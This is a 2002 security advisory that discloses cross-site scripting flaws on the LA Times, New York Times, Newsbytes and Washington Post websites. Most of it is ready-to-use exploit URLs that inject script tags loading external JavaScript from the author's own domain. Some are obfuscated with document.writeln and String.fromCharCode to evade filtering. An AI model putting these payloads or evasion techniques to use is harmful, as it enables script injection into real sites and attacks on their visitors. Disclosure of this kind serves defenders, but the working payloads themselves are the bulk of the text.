Point Blank Security Notice Friday, March 08, 2002 Title: Subversion of Information Vulnerabilities on Major News Sites Advisory: PBS0302002 Author: Jeremiah Jacks, Point Blank Security Summary: http://www.cert.org/advisories/CA-2000-02.html Disclaimer: This information is provided "AS IS". Point Blank Security and the author of this document disclaim all warranties, express and implied, with regard to this information. This information is provided only for legitimate security analysis purposes. Point Blank Security and the author does not condone the unauthorized access of systems, and specifically prohibits the use or reproduction of this information for such purposes. In no event shall Point Blank Security or the author be liable for any damages whatsoever arising out of or in connection with the use or dissemination of this information. Any use of this information is at the user's own risk. Exploitation: LA Times 01) http://latimes.com/search/lat_all.jsp?Query=<script+src=http://pointblanksec urity.com/css/latimes.js></script> Credit: Jeremiah Jacks NY Times 01) http://www.nytimes.com/corrections.html?pagewanted=";><script>document.writel n('<script');document.writeln('src=http://pointblanksecurity.com/css/nytimes .js><\/script>');</script><a+href=" Credit: Jeremiah Jacks Newsbytes 01) http://www.newsbytes.com/cgi-bin/udt/mlm.user.register?client.id=newsbytes&e mail.address="><script>function+Chr(code){return+String.fromCharCode(code);} document.writeln('<script');document.write('src');document.write(Chr(61));do cument.write('http://pointblanksecurity.com/css/newsbytes.js><\/script>');</ script><a Credit: Jeremiah Jacks The Washington Post 01) http://www.washingtonpost.com/ac3/ContentServer?pagename=world/worldsearch&C OUNTRY=<script+src=http://pointblanksecurity.com/css/washpost.js></script> Credit: Jeremiah Jacks More Examples At: http://www.pointblanksecurity.com/css/
